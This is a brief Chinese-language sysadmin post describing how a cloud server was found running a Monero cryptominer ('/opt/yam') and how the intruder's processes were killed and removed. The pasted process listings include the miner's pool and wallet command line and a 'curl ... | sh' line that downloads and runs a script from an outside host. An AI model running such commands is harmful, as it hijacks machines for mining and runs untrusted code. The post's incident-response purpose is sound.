一台不太用阿里雲服務器被運營報告連不上。putty登錄查看發現全是一個叫yam的進程。
上網查了一下,可能是被做成挖礦機了。
先查看進程
ps aux |grep yam
結果如下
root 670 0.9 1.8 188648 18456 ? Sl Nov22 212:41 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr root 904 0.9 2.0 188648 20556 ? Sl Nov22 212:20 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr root 1462 0.9 2.0 188648 20396 ? Sl Nov22 211:58 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr root 1976 0.9 1.4 188648 14464 ? Sl Nov22 211:35 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr root 2520 0.9 0.6 188648 6640 ? Sl Nov22 211:08 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr
....
先把進程殺掉
killall -9 yam
再查看所有進程
ps aut
root 28658 0.0 0.0 4064 76 ? Ss+ Nov23 0:00 /sbin/mingetty /dev/tty1 root 28659 0.0 0.0 4064 76 ? Ss+ Nov23 0:00 /sbin/mingetty /dev/tty2 root 28660 0.0 0.0 4064 72 ? Ss+ Nov23 0:00 /sbin/mingetty /dev/tty3 root 28661 0.0 0.0 4064 72 ? Ss+ Nov23 0:00 /sbin/mingetty /dev/tty4 root 28662 0.0 0.0 4064 76 ? Ss+ Nov23 0:00 /sbin/mingetty /dev/tty5 root 28808 0.0 0.0 4064 76 ? Ss+ Nov23 0:00 /sbin/mingetty /dev/tty6 root 29794 0.0 0.0 106092 148 ? Ss Nov21 0:00 /bin/sh -c curl -fsSL http://www.haveabitchin.com/pm.sh?1118 | sh root 29797 0.0 0.0 106096 156 ? S Nov21 0:00 sh root 29915 0.0 0.4 208564 4596 ? Sl Nov21 1:57 /tmp/duckduckgo
發現這一段明顯是劫持過程。
然后把這些文件全部刪除。
完畢。